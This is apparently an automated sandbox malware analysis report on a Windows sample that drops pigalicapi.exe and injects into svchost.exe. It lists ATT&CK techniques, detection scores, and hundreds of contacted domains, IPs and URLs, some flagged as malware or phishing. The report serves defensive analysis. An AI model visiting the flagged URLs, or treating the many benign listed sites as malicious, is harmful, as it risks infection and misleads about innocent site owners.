                Source: Yara matchFile source: 0.2.EwK95WVtzI.exe.13f0000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.svchost.exe.4000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.pigalicapi.exe.a10000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2743016042.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2743752559.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                1
                Access Token Manipulation
                111
                Masquerading
                OS Credential Dumping2
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium21
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts23
                Native API
                Boot or Logon Initialization Scripts612
                Process Injection
                121
                Virtualization/Sandbox Evasion
                LSASS Memory341
                Security Software Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth4
                Ingress Tool Transfer
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)1
                Registry Run Keys / Startup Folder
                1
                Access Token Manipulation
                Security Account Manager121
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
                Process Injection
                NTDS2
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer125
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                System Network Configuration Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem35
                System Information Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1322205 Sample: EwK95WVtzI.exe Startdate: 09/10/2023 Architecture: WINDOWS Score: 100 37 fdlymca.org 2->37 39 www.medisa.info 2->39 41 918 other IPs or domains 2->41 81 Snort IDS alert for network traffic 2->81 83 Multi AV Scanner detection for domain / URL 2->83 85 Antivirus detection for URL or domain 2->85 89 6 other signatures 2->89 8 pigalicapi.exe 48 2->8         started        12 EwK95WVtzI.exe 3 68 2->12         started        signatures3 87 Tries to resolve many domain names, but no domain seems valid 39->87 process4 dnsIp5 43 zemarmot.net 8->43 45 www.koz1.net 8->45 51 3 other IPs or domains 8->51 91 Antivirus detection for dropped file 8->91 93 Multi AV Scanner detection for dropped file 8->93 95 Machine Learning detection for dropped file 8->95 105 5 other signatures 8->105 15 svchost.exe 8->15         started        19 svchost.exe 8->19         started        47 104.21.46.148, 49712, 49792, 80 CLOUDFLARENETUS United States 12->47 49 108.167.164.216, 49744, 49862, 80 UNIFIEDLAYER-AS-1US United States 12->49 53 31 other IPs or domains 12->53 35 C:\Users\user\pigalicapi.exe, PE32 12->35 dropped 97 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->97 99 Contains functionality to inject threads in other processes 12->99 101 Drops PE files to the user root directory 12->101 103 Contains functionality to inject code into remote processes 12->103 21 svchost.exe 12->21         started        23 svchost.exe 12->23         started        file6 signatures7 process8 dnsIp9 69 mail.airmail.net 66.226.70.66, 25, 49874 INFB2-ASUS United States 15->69 71 System process connects to network (likely due to code injection or exploit) 15->71 73 Injects a PE file into a foreign processes 15->73 25 svchost.exe 15->25         started        29 svchost.exe 12 15->29         started        31 svchost.exe 1 12 15->31         started        33 svchost.exe 12 15->33         started        75 Found evasive API chain (may stop execution after checking mutex) 21->75 77 Contains functionality to inject threads in other processes 21->77 79 Contains functionality to detect sleep reduction / modifications 21->79 signatures10 process11 dnsIp12 55 toundo.net 25->55 57 k-nikko.com 25->57 61 879 other IPs or domains 25->61 107 System process connects to network (likely due to code injection or exploit) 25->107 109 Opens the same file many times (likely Sandbox evasion) 25->109 63 41 other IPs or domains 29->63 65 20 other IPs or domains 31->65 59 piacton.com 33->59 67 23 other IPs or domains 33->67 signatures13 111 Tries to resolve many domain names, but no domain seems valid 59->111

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                EwK95WVtzI.exe21%ReversingLabs
                EwK95WVtzI.exe31%VirustotalBrowse
                EwK95WVtzI.exe100%AviraHEUR/AGEN.1360695
                EwK95WVtzI.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\pigalicapi.exe100%AviraHEUR/AGEN.1360695
                C:\Users\user\pigalicapi.exe100%Joe Sandbox ML
                C:\Users\user\pigalicapi.exe21%ReversingLabs
                No Antivirus matches
                SourceDetectionScannerLabelLink
                impexnc.com0%VirustotalBrowse
                webways.com9%VirustotalBrowse
                dayvo.com2%VirustotalBrowse
                use1.akam.net0%VirustotalBrowse
                enguita.net1%VirustotalBrowse
                shteeble.com2%VirustotalBrowse
                mailin100.dcpserver.de0%VirustotalBrowse
                gphpedit.org0%VirustotalBrowse
                kallman.net0%VirustotalBrowse
                avse.hu4%VirustotalBrowse
                dns1.a2zsitesolutions.net0%VirustotalBrowse
                aspmx3.googlemail.com0%VirustotalBrowse
                notis.ru2%VirustotalBrowse
                ns2.webunlimited.com0%VirustotalBrowse
                www.jenco.co.uk0%VirustotalBrowse
                shesfit.com1%VirustotalBrowse
                www.mobilnic.net3%VirustotalBrowse
                dog-jog.net2%VirustotalBrowse
                kamptal.at1%VirustotalBrowse
                www.vexcom.com2%VirustotalBrowse
                nts-web.net2%VirustotalBrowse
                tcpoa.com2%VirustotalBrowse
                www.tyrns.com9%VirustotalBrowse
                bd-style.com8%VirustotalBrowse
                polishprincess.us0%VirustotalBrowse
                dns1.p04.nsone.net0%VirustotalBrowse
                muhr-soehne.de0%VirustotalBrowse
                netoverdrive-com-au.p10.mxthunder.com0%VirustotalBrowse
                zupraha.cz3%VirustotalBrowse
                oaith.ca2%VirustotalBrowse
                usadig.com9%VirustotalBrowse
                ns-1497.awsdns-59.org0%VirustotalBrowse
                ns1.securetrafficrouting.com0%VirustotalBrowse
                a9-66.akam.net0%VirustotalBrowse
                aiolos-sa.gr1%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-1170x658.jpg0%Avira URL Cloudsafe
                http://a-domani.com/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik0%Avira URL Cloudsafe
                http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.620%Avira URL Cloudsafe
                https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg0%Avira URL Cloudsafe
                https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg0%Avira URL Cloudsafe
                http://skypearl.com/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/themes/elpro/js/functions.js?ver=1.0.00%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/kalibracija/0%Avira URL Cloudsafe
                https://www.stajerskagz.si/o-sgz-2/0%Avira URL Cloudsafe
                http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc0%Avira URL Cloudsafe
                https://pohlfood.com/#website0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/prikazovalnik-toka-jola/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/rotronic/temperatura-rotronic-merilniki-temperature/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/jola-nivo-tekocin/regulacija-nivoja/meritev0%Avira URL Cloudsafe
                https://www.pcgrate.com/#webpage0%Avira URL Cloudsafe
                https://inhouse.pohlfood.com/0%Avira URL Cloudsafe
                http://pohlfood.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=26c380492a5e27db8a412ecdd0%Avira URL Cloudsafe
                http://www.pcgrate.com/wp-content/uploads/the7-css/post-type-dynamic.css?ver=c08792de11d20%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/0%Avira URL Cloudsafe
                https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg0%Avira URL Cloudsafe
                https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1.png0%Avira URL Cloudsafe
                http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.js0%Avira URL Cloudsafe
                http://gpthink.com/product/204.html100%Avira URL Cloudmalware
                http://dog-jog.net/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/pretvorniki-tlaka-wika/0%Avira URL Cloudsafe
                http://www.elpro.si/0%Avira URL Cloudsafe
                https://www.clinicasanluis.com.co/0%Avira URL Cloudsafe
                http://likangds.com/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/temperatura/prikazovalniki-temperature/0%Avira URL Cloudsafe
                http://univi.it/0%Avira URL Cloudsafe
                https://www.elpro.si/avtorji/0%Avira URL Cloudsafe
                https://www.pwd.org/0%Avira URL Cloudsafe
                http://sigtoa.com/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-34-eu/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/plugins/magic-tooltips-for-contact-form-7/assets/css/jquery.qtip.min.0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/resitve-za/industrija/0%Avira URL Cloudsafe
                http://www.credo.edu.pl/100%Avira URL Cloudmalware
                https://www.elpro.si/kategorija-izdelka/rotronic/tlak-rotronic-merilniki-tlaka/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/plugins/yith-woocommerce-wishlist/assets/css/jquery.selectBox.css?ver0%Avira URL Cloudsafe
                http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver0%Avira URL Cloudsafe
                http://www.olras.com/x0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerji0%Avira URL Cloudsafe
                https://pohlfood.com/comments/feed/0%Avira URL Cloudsafe
                https://www.aevga.com/100%Avira URL Cloudmalware
                https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/tlak/0%Avira URL Cloudsafe
                http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.250%Avira URL Cloudsafe
                http://www.naoi-a.com/0%Avira URL Cloudsafe
                http://www.myropcb.com/services-capabilities/pcb-restoration/0%Avira URL Cloudsafe
                http://www.abdg.com/0%Avira URL Cloudsafe
                http://hes.pt/0%Avira URL Cloudsafe
                http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.10%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/0%Avira URL Cloudsafe
                http://www.valselit.com/177-appartement-a-vendre-sigean-30378100%Avira URL Cloudmalware
                http://www.myropcb.com/services-capabilities/stencil/0%Avira URL Cloudsafe
                http://www.ora-ito.com/9b0%Avira URL Cloudsafe
                http://www.myropcb.com/why-use-myro/0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/nivo/pretvorniki-nivoja/0%Avira URL Cloudsafe
                http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.00%Avira URL Cloudsafe
                https://www.nelipak.nl/100%Avira URL Cloudmalware
                http://www.vitaindu.com/D3100%Avira URL Cloudphishing
                http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.00%Avira URL Cloudsafe
                http://gholographic.com/0%Avira URL Cloudsafe
                http://calvinly.com/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/plugins/sitepress-multilingual0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen0%Avira URL Cloudsafe
                http://www.crcsi.org/X0%Avira URL Cloudsafe
                https://tickets.suresupport.com/faq/article-1596/en0%Avira URL Cloudsafe
                https://www.ora-ito.com/0%Avira URL Cloudsafe
                http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)0%Avira URL Cloudsafe
                https://www.lrsuk.com/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.00%Avira URL Cloudsafe
                http://www.aevga.com/Kw3100%Avira URL Cloudmalware
                http://www.crcsi.org/e0%Avira URL Cloudsafe
                http://myropcb.com/login/0%Avira URL Cloudsafe
                http://ruzee.com/0%Avira URL Cloudsafe
                http://redgiga.com/0%Avira URL Cloudsafe
                http://www.winhui.cn/template/default/img/fixedimg4.png0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/wika-partner/0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/plugins/mailchimp-for-woocommerce/public/js/mailchimp-woocommerce-pub0%Avira URL Cloudsafe
                http://www.elpro.si/wp-content/plugins/cf7-conditional-fields/style.css?ver=2.3.90%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti0%Avira URL Cloudsafe
                https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/0%Avira URL Cloudsafe
                https://pohlfood.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fpohlfood.com%2F0%Avira URL Cloudsafe
                https://pohlfood.com/wp-content/uploads/iStock-1031193710b.jpg0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                impexnc.com
                208.91.197.46
                truefalseunknown
                webways.com
                104.21.1.51
                truetrueunknown
                mx4.burnserver.com
                167.99.227.19
                truetrue
                  unknown
                  antispam.solunet.it
                  185.149.189.80
                  truefalse
                    unknown
                    use1.akam.net
                    72.246.46.64
                    truefalseunknown
                    dayvo.com
                    104.21.68.7
                    truefalseunknown
                    hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com
                    3.130.253.23
                    truefalse
                      high
                      troygroup.com.2.0001.arsmtp.com
                      8.19.118.177
                      truetrue
                        unknown
                        enguita.net
                        195.5.116.23
                        truefalseunknown
                        evertek-net.mx.av-mx.com
                        150.136.204.204
                        truefalse
                          unknown
                          shteeble.com
                          185.106.129.180
                          truetrueunknown
                          mailin100.dcpserver.de
                          212.53.180.5
                          truefalseunknown
                          kallman.net
                          0.0.0.0
                          truefalseunknown
                          gphpedit.org
                          127.0.0.1
                          truefalseunknown
                          dns1.a2zsitesolutions.net
                          107.155.71.103
                          truefalseunknown
                          fsrinc-com.mail.protection.outlook.com
                          104.47.73.10
                          truefalse
                            high
                            avse.hu
                            185.129.138.60
                            truefalseunknown
                            ns2.webunlimited.com
                            208.88.72.111
                            truetrueunknown
                            ns9.zoneedit.com
                            139.177.204.42
                            truefalse
                              high
                              mx1.veeam.com
                              216.253.77.21
                              truefalse
                                high
                                aspmx3.googlemail.com
                                142.250.152.27
                                truetrueunknown
                                notis.ru
                                185.178.208.141
                                truefalseunknown
                                www.jenco.co.uk
                                172.67.208.67
                                truefalseunknown
                                www.tyrns.com
                                217.79.184.35
                                truefalseunknown
                                nts-web.net
                                49.212.235.175
                                truefalseunknown
                                willsub.com
                                69.89.107.122
                                truefalse
                                  high
                                  foodallergy-com.mail.protection.outlook.com
                                  104.47.66.10
                                  truefalse
                                    high
                                    shesfit.com
                                    104.21.74.141
                                    truetrueunknown
                                    ns2.centrum.cz
                                    93.185.103.191
                                    truefalse
                                      high
                                      www.vexcom.com
                                      172.67.173.200
                                      truefalseunknown
                                      hlag-com.mail.protection.outlook.com
                                      52.101.73.30
                                      truefalse
                                        high
                                        tcpoa.com
                                        164.90.244.158
                                        truefalseunknown
                                        gourmet7.spamgourmet.com
                                        216.75.62.102
                                        truefalse
                                          high
                                          www.mobilnic.net
                                          154.203.14.100
                                          truefalseunknown
                                          dog-jog.net
                                          153.122.24.177
                                          truetrueunknown
                                          kamptal.at
                                          128.204.134.138
                                          truetrueunknown
                                          dns1.p04.nsone.net
                                          198.51.44.4
                                          truefalseunknown
                                          bd-style.com
                                          103.112.69.92
                                          truefalseunknown
                                          ora.ecnet.jp
                                          60.43.154.138
                                          truefalse
                                            high
                                            polishprincess.us
                                            192.254.233.152
                                            truetrueunknown
                                            zupraha.cz
                                            77.78.104.3
                                            truetrueunknown
                                            muhr-soehne.de
                                            5.189.171.125
                                            truetrueunknown
                                            netoverdrive-com-au.p10.mxthunder.com
                                            216.172.106.24
                                            truetrueunknown
                                            hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com
                                            54.161.222.85
                                            truefalse
                                              high
                                              burke-org.mail.protection.outlook.com
                                              104.47.73.138
                                              truefalse
                                                high
                                                a9-66.akam.net
                                                184.85.248.66
                                                truefalseunknown
                                                oaith.ca
                                                192.124.249.12
                                                truetrueunknown
                                                ns1.securetrafficrouting.com
                                                139.144.190.94
                                                truefalseunknown
                                                mail3.ocel.cz
                                                90.181.133.178
                                                truetrue
                                                  unknown
                                                  aiolos-sa.gr
                                                  104.21.26.121
                                                  truefalseunknown
                                                  rxlps-com.mail.protection.outlook.com
                                                  52.101.42.13
                                                  truefalse
                                                    high
                                                    ns-1497.awsdns-59.org
                                                    205.251.197.217
                                                    truefalseunknown
                                                    usadig.com
                                                    198.100.146.220
                                                    truetrueunknown
                                                    dns1.a1.net
                                                    80.120.17.26
                                                    truefalse
                                                      high
                                                      fsr-mx.email-protect.gosecure.net
                                                      208.80.204.155
                                                      truefalse
                                                        unknown
                                                        immobiliarepunto.it
                                                        81.29.220.21
                                                        truetrue
                                                          unknown
                                                          mx.blog-galaxy.com
                                                          108.61.164.91
                                                          truefalse
                                                            unknown
                                                            gmail-smtp-in.l.google.com
                                                            74.125.137.27
                                                            truefalse
                                                              high
                                                              fdlymca.org
                                                              192.124.249.9
                                                              truetrue
                                                                unknown
                                                                assideum.com
                                                                52.219.92.168
                                                                truetrue
                                                                  unknown
                                                                  bidroll.com
                                                                  13.56.33.8
                                                                  truefalse
                                                                    unknown
                                                                    d2r2uj0bnofxxz.cloudfront.net
                                                                    13.33.21.96
                                                                    truefalse
                                                                      high
                                                                      pcl-com.mail.protection.outlook.com
                                                                      104.47.75.164
                                                                      truefalse
                                                                        high
                                                                        ns6444.hostgator.com
                                                                        192.254.233.150
                                                                        truefalse
                                                                          high
                                                                          mxa.inbound.socket.net
                                                                          216.106.44.52
                                                                          truetrue
                                                                            unknown
                                                                            www.valselit.com
                                                                            193.70.68.254
                                                                            truetrue
                                                                              unknown
                                                                              whitemc-it.mail.protection.outlook.com
                                                                              52.101.68.5
                                                                              truefalse
                                                                                high
                                                                                filter10.antispamcloud.com
                                                                                38.89.254.156
                                                                                truefalse
                                                                                  high
                                                                                  karmy.com.pl
                                                                                  185.253.212.22
                                                                                  truetrue
                                                                                    unknown
                                                                                    ns-203.awsdns-25.com
                                                                                    205.251.192.203
                                                                                    truefalse
                                                                                      unknown
                                                                                      vdoherty.com
                                                                                      91.216.241.100
                                                                                      truefalse
                                                                                        unknown
                                                                                        pb-games.com
                                                                                        173.254.28.29
                                                                                        truefalse
                                                                                          unknown
                                                                                          domains2.uniserve.com
                                                                                          216.113.192.6
                                                                                          truefalse
                                                                                            high
                                                                                            ns3.combell.net
                                                                                            83.217.73.172
                                                                                            truetrue
                                                                                              unknown
                                                                                              mx2.hostinger.com
                                                                                              172.65.182.103
                                                                                              truefalse
                                                                                                high
                                                                                                mail.aspea.de
                                                                                                212.112.246.226
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  ncn.de
                                                                                                  46.30.60.158
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    fnw.us
                                                                                                    137.118.26.67
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      komie.com
                                                                                                      59.106.13.181
                                                                                                      truetrue
                                                                                                        unknown
                                                                                                        ftmobile.com
                                                                                                        199.34.228.78
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          onzcda.com
                                                                                                          15.197.204.56
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            sledsport.ru
                                                                                                            185.22.232.175
                                                                                                            truetrue
                                                                                                              unknown
                                                                                                              au-smtp-inbound-1.mimecast.com
                                                                                                              103.13.69.26
                                                                                                              truefalse
                                                                                                                high
                                                                                                                mail.bulldognews.com
                                                                                                                192.252.144.35
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  tbvlugus.nl
                                                                                                                  174.129.25.170
                                                                                                                  truefalse
                                                                                                                    high
                                                                                                                    w017197b.kasserver.com
                                                                                                                    85.13.164.11
                                                                                                                    truefalse
                                                                                                                      high
                                                                                                                      pellys.co.uk
                                                                                                                      77.72.4.226
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        relay.mx.skynet.be
                                                                                                                        195.238.20.26
                                                                                                                        truefalse
                                                                                                                          high
                                                                                                                          semuk.com
                                                                                                                          86.105.245.69
                                                                                                                          truetrue
                                                                                                                            unknown
                                                                                                                            hasslo.ns.cloudflare.com
                                                                                                                            108.162.195.134
                                                                                                                            truefalse
                                                                                                                              high
                                                                                                                              tozzhin.com
                                                                                                                              202.94.166.30
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                mail.airmail.net
                                                                                                                                66.226.70.66
                                                                                                                                truefalse
                                                                                                                                  high
                                                                                                                                  lyto.net
                                                                                                                                  104.21.62.182
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    mx0a-001a4e01.pphosted.com
                                                                                                                                    208.84.65.33
                                                                                                                                    truefalse
                                                                                                                                      high
                                                                                                                                      ns0.ntt.co.th
                                                                                                                                      116.68.146.1
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        waldi.pl
                                                                                                                                        46.242.238.60
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          websy.com
                                                                                                                                          76.223.54.146
                                                                                                                                          truetrue
                                                                                                                                            unknown
                                                                                                                                            em4.mainnetmail.com
                                                                                                                                            142.93.233.86
                                                                                                                                            truetrue
                                                                                                                                              unknown
                                                                                                                                              106west.com
                                                                                                                                              148.130.4.196
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                mx1.hostinger.com
                                                                                                                                                172.65.182.103
                                                                                                                                                truefalse
                                                                                                                                                  high
                                                                                                                                                  NameMaliciousAntivirus DetectionReputation
                                                                                                                                                  http://skypearl.com/true
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://a-domani.com/false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://dog-jog.net/false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://www.clinicasanluis.com.co/true
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://univi.it/false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://likangds.com/false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.elpro.si/false
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.credo.edu.pl/false
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  unknown
                                                                                                                                                  http://sigtoa.com/true
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://dhh.la.gov/false
                                                                                                                                                    high
                                                                                                                                                    http://www.naoi-a.com/false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://www.abdg.com/false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://hes.pt/false
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://msl-lock.com/false
                                                                                                                                                      high
                                                                                                                                                      https://ldh.la.gov/false
                                                                                                                                                        high
                                                                                                                                                        http://calvinly.com/false
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://ruzee.com/true
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        http://redgiga.com/false
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                        https://www.stajerskagz.si/o-sgz-2/EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
